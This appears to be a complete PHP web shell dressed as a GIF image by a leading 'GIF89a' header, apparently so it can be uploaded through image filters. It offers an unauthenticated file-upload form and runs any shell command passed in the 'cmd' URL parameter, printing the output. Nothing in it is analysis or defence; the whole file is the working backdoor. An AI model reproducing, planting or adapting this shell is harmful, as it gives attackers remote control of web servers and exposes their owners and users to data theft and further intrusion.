GIF89a;
<?php 
@error_reporting(0);
@set_time_limit(0);
echo"<b>VULN</b><br>";
if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Berhasil";}else{echo"Gak Berhasil";}}else{echo"<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=Go!>";}
echo 'VULN';
$c = isset($_GET["cmd"]) ? $_GET["cmd"] : "";
$d = proc_open(
    "sh -c " . escapeshellarg($c),
    [1 => ["pipe", "w"], 2 => ["pipe", "w"]],
    $p);
while ($o = fgets($p[1])) {
    echo $o;
}
while ($e = fgets($p[2])) {
    echo $e;
}
fclose($p[1]);
fclose($p[2]);
proc_close($d); 
?>